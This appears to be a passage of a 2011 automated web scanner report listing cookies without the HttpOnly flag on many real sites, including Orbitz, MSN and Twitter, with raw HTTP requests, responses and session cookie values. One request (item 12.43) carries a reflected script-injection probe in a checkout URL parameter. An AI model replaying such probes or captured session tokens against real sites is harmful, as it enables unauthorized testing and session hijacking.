<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">



<h
...[SNIP]...

12.18. https://careers.microsoft.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://careers.microsoft.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionProfile=ysf2phmmwmrwurexvwe3yi45; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.19. http://ccc01.opinionlab.com/comment_card.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ccc01.opinionlab.com
Path:	/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCSBQDBAR=BCCAJPIDIILGIPAPFEJMBMFM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment_card.asp HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 150
Content-Type: text/html
Location: /pasp/comment_card_cache.asp?
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSBQDBAR=BCCAJPIDIILGIPAPFEJMBMFM; path=/
Date: Tue, 01 Feb 2011 15:30:52 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/pasp/comment_card_cache.asp?">here</a>.</body>

12.20. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCSBQDBAR=KCCAJPIDHIPFBLPHLBGGEPJN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSBQDBAR=KCCAJPIDHIPFBLPHLBGGEPJN; path=/
Date: Tue, 01 Feb 2011 15:30:54 GMT
Connection: close

12.21. http://clickaider.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://clickaider.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2dblg2ojg95vrueh1o2ogo6fc7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.22. http://corp.orbitz.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://corp.orbitz.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSc57eb9d13b46000ec67f39fb6c72bb7b=c58c740357a69175e78bc80cc482bf6d; expires=Thu, 24-Feb-2011 19:04:40 GMT; path=/; domain=.corp.orbitz.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: corp.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESSc57eb9d13b46000ec67f39fb6c72bb7b=c58c740357a69175e78bc80cc482bf6d; expires=Thu, 24-Feb-2011 19:04:40 GMT; path=/; domain=.corp.orbitz.com
Last-Modified: Tue, 01 Feb 2011 15:02:16 GMT
ETag: "4b6ad4ad993428d4a1392a134a6b30dc"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

12.23. http://corp.orbitz.com/careers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://corp.orbitz.com
Path:	/careers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSc57eb9d13b46000ec67f39fb6c72bb7b=0f095135595a6408fe67808b3167b068; expires=Thu, 24-Feb-2011 19:04:42 GMT; path=/; domain=.corp.orbitz.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers HTTP/1.1
Host: corp.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 15:31:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESSc57eb9d13b46000ec67f39fb6c72bb7b=0f095135595a6408fe67808b3167b068; expires=Thu, 24-Feb-2011 19:04:42 GMT; path=/; domain=.corp.orbitz.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 01 Feb 2011 15:31:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://careers.orbitz.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

12.24. http://corp.orbitz.com/partnerships/advertise.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://corp.orbitz.com
Path:	/partnerships/advertise.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSc57eb9d13b46000ec67f39fb6c72bb7b=16ff28db9f3afcdddf5688ea67ee156a; expires=Thu, 24-Feb-2011 19:04:41 GMT; path=/; domain=.corp.orbitz.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partnerships/advertise.html HTTP/1.1
Host: corp.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 15:31:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESSc57eb9d13b46000ec67f39fb6c72bb7b=16ff28db9f3afcdddf5688ea67ee156a; expires=Thu, 24-Feb-2011 19:04:41 GMT; path=/; domain=.corp.orbitz.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 01 Feb 2011 15:31:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://corp.orbitz.com/partnerships/advertise
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

12.25. http://corp.orbitz.com/partnerships/affiliates.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://corp.orbitz.com
Path:	/partnerships/affiliates.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSc57eb9d13b46000ec67f39fb6c72bb7b=a74b6216b4b56be30c0a0f077408c86b; expires=Thu, 24-Feb-2011 19:04:41 GMT; path=/; domain=.corp.orbitz.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partnerships/affiliates.html HTTP/1.1
Host: corp.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 15:31:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESSc57eb9d13b46000ec67f39fb6c72bb7b=a74b6216b4b56be30c0a0f077408c86b; expires=Thu, 24-Feb-2011 19:04:41 GMT; path=/; domain=.corp.orbitz.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 01 Feb 2011 15:31:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://corp.orbitz.com/partnerships/affiliates
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

12.26. http://cruises.orbitz.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cruises.orbitz.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCSQDSDDC=LJFDICBAGOGCDGDPGGGHPIFM; path=/
WDVID=%7BAFB0B749%2D075D%2D44BF%2DB60B%2DB6BF043B31B7%7D; path=/
WDUID=%7BE5904506%2D9924%2D4D11%2DBA78%2DE65D804B066F%7D; expires=Wed, 02-Feb-2022 05:00:00 GMT; path=/
NSC_WJQ-DSVJTFT.PSCJUA.DPN=ffffffff095b1c2245525d5f4f58455e445a4a423662;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cruises.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.27. http://dating.msn.com/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dating.msn.com
Path:	/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MatchSession=CDTF=2/1/2011&UMID=7ce63b61-4371-4505-be3a-577c3ee3e6ee; expires=Wed, 01-Feb-2012 15:31:25 GMT; path=/
Match=CCount=1&CDate=2/1/2011; expires=Wed, 01-Feb-2012 15:31:25 GMT; path=/
dMatch=CCount=1&CDate=2/1/2011; domain=match.com; expires=Wed, 01-Feb-2012 15:31:25 GMT; path=/
SECU=TID=516068&ESID=a3025243-4832-40ea-9057-0b92bee62d47&THEME=81; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.28. http://dating.msn.com/search/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dating.msn.com
Path:	/search/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MatchSession=CDTF=2/1/2011&UMID=d897a311-c3d6-435a-b456-c27f4993fc82; expires=Wed, 01-Feb-2012 15:31:27 GMT; path=/
Match=CCount=1&CDate=2/1/2011; expires=Wed, 01-Feb-2012 15:31:27 GMT; path=/
dMatch=CCount=1&CDate=2/1/2011; domain=match.com; expires=Wed, 01-Feb-2012 15:31:27 GMT; path=/
SECU=TID=516068&ESID=0c4eb032-a9c2-40aa-b1e4-2152dd96efec&THEME=74; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.29. http://dev.twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dev.twitter.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCOQY0OctAToOcmV0dXJuX3RvIhxodHRwOi8v%250AZGV2LnR3aXR0ZXIuY29tLzoHaWQiJTgxNjZlZjA5Yjk3MDk3ZTkzNzY3NzNl%250AZTdlZjA3ZDE1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--3f74dffcbda83e02ede7f40fb1c9fbf484dea921; domain=.twitter.com; path=/
k=173.193.214.243.1296674330831255; path=/; expires=Wed, 09-Feb-11 19:18:50 GMT; domain=.twitter.com
guest_id=129667433084978945; path=/; expires=Fri, 04 Mar 2011 19:18:50 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: dev.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.30. https://faq.orbitz.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://faq.orbitz.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cp_session=UykAdAJ2BCBXPwJyVkoGTgI0UkUEEgIuB21baAMjAHoBcwdrByFVbA4tBA4BKQJ3UWYBIAIiUTkBalZqAQgBegtBCmFUGAMlUVsETgA9BVZTAQACAk8ERFdUAmNWbQZ0AmdSdwRsAmsHI1t%2B; path=/
TS2744aa=b86dc7ce556c42b11585c5072c4ea4e4605623f144bde6d64d48259c; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.31. https://faq.orbitz.com/app/answers/detail/a_id/15644 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://faq.orbitz.com
Path:	/app/answers/detail/a_id/15644

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cp_session=VC4CdgB0AycDawNzU2UCVQRTVkABFwcrBG5baFZ2VC4DcVQ8AScCO1BgWCJQdQh7WysHb1V9ACNSNwQJBjpUZAMnAWNQcAhvUTQFOlZmAzRUdwIpACsDJwM0A3NTOgIhBFxWKwEnBzYEcVtwVj1UbQM9VAEBKgJNUGNYSFBlCEJbcwcQVXAAYlJkBDoGOFRMAzcBD1AFCAtRMQVeVhYDZVQSAiwAdQMnAyw%3D; path=/
TS8118ae=ea207c4d029b321ea2f9a03a1b4ba8facb1b7ea06212bb0d4d48259b; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/answers/detail/a_id/15644 HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.32. http://games.msn.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSGmSession=RUID=f56e2aa94ee94cd4a6048f2d7643f670&Env=AP2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: games.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.33. http://hackergearonline.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://hackergearonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=nglaeqmf4vbvqtkh78t78qauh5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hackergearonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 15:31:59 GMT
Server: Apache
Set-Cookie: PHPSESSID=nglaeqmf4vbvqtkh78t78qauh5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.hackergearonline.com/xmlrpc.php
Location: http://www.hackergearonline.com/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.34. http://ie6funeral.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ie6funeral.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS3386ceb03ae8a2a8b004e24a99ee39cd=eqasj5fmmjfunb26i2ort8jfn3; expires=Sat, 26 Feb 2011 11:04:38 GMT; path=/; domain=.ie6funeral.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ie6funeral.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 07:31:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS3386ceb03ae8a2a8b004e24a99ee39cd=eqasj5fmmjfunb26i2ort8jfn3; expires=Sat, 26 Feb 2011 11:04:38 GMT; path=/; domain=.ie6funeral.com
Last-Modified: Wed, 31 Mar 2010 23:17:09 GMT
ETag: "d2ef9e5aa482e662b02c5d459c2371e9"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8503

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Announcement | IE6 Funeral</title>

<link rel="shortcut icon" href="/misc/favicon.ico
...[SNIP]...

12.35. http://inforavel.com/ad_type.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://inforavel.com
Path:	/ad_type.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SessionID=5e3cd305-ab24-4329-8ec0-634b2f42cccf; path=/
yahooToken=qs=06oENya4ZG1YS6vOLJwpLiFdjG98_EoLBqyrVmG-Zlh6Mn7Gha9y_fog1SPfM6I1gYYEXwxRBlK9Gk0QXVVY3jmx__cJsb9mDrSYw40rcu-MISNC33ktOan7_D_Eo9R1XSSlmaqbEIsj36tjgXq4pDpL_yX_Oa3YxcY_UG2OfsiUr0xXfIBaMgBHD845XchyiwGS1I1Us.,YT0zO2s9NDU.; path=/
VisitorID=cf730450-a244-49d2-aa9f-24d511134b3a&Exp=2/2/2014 11:20:53 AM; expires=Sun, 02-Feb-2014 19:20:53 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad_type.php HTTP/1.1
Host: inforavel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14613
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=5e3cd305-ab24-4329-8ec0-634b2f42cccf; path=/
Set-Cookie: VisitorID=cf730450-a244-49d2-aa9f-24d511134b3a&Exp=2/2/2014 11:20:53 AM; expires=Sun, 02-Feb-2014 19:20:53 GMT; path=/
Set-Cookie: yahooToken=qs=06oENya4ZG1YS6vOLJwpLiFdjG98_EoLBqyrVmG-Zlh6Mn7Gha9y_fog1SPfM6I1gYYEXwxRBlK9Gk0QXVVY3jmx__cJsb9mDrSYw40rcu-MISNC33ktOan7_D_Eo9R1XSSlmaqbEIsj36tjgXq4pDpL_yX_Oa3YxcY_UG2OfsiUr0xXfIBaMgBHD845XchyiwGS1I1Us.,YT0zO2s9NDU.; path=/
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 19:20:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

12.36. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://johannburkard.de
Path:	/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4C474270C78D978371F54CBF92957F65; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html HTTP/1.1
Host: johannburkard.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.37. http://leads.demandbase.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://leads.demandbase.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=addae387d597592b3bd5b6c7b93dd836; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: leads.demandbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=236660194602537908;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 19:20:55 GMT
Server: Apache
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Set-Cookie: PHPSESSID=addae387d597592b3bd5b6c7b93dd836; path=/
Cache-Control: must-revalidate, no-cache
Location: /user/
Vary: Accept-Encoding
Content-Length: 716
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>Demandbase, Inc. | Demandbase Connect</title>
<meta name="description" content="Demandbase Connect" />
<meta name="keywords" content="Demandbase Connect" />
<meta
...[SNIP]...

12.38. http://m.twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://m.twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToVaW5fbmV3X3VzZXJfZmxvdzA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4%250ANTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCPJP%250Aud4tAQ%253D%253D--68405592e8acf69fc0a9e659d46c67302e2aaff9; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.39. http://mad4milk.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://mad4milk.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22367b35c5ff7f573e3fa5a17fdddc99df%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296660843%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Wed, 02-Feb-2011 17:34:03 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:03 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22367b35c5ff7f573e3fa5a17fdddc99df%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296660843%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Wed, 02-Feb-2011 17:34:03 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-e
...[SNIP]...

12.40. http://nationalcybersecurity.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://nationalcybersecurity.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ds41v3c3cbm3uiu8ka9rtj5g16; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nationalcybersecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:38:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=ds41v3c3cbm3uiu8ka9rtj5g16; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://nationalcybersecurity.net/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

12.41. http://outsideonline.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://outsideonline.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSION_OO=4D016841016079F74267BAA86260494D; Path=/
NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: outsideonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.42. http://pressroom.orbitz.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pressroom.orbitz.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2a1so5b76adjb51svfmikcret7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pressroom.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:39:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2a1so5b76adjb51svfmikcret7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head>
<ti
...[SNIP]...

12.43. https://secure.avangate.com/order/checkout.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.avangate.com
Path:	/order/checkout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=mhap601shf0fv6lib5ejliho2q6t64ul; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be738649d%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea6894fb0eab HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12.44. http://solutions.liveperson.com/ref/lppb.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

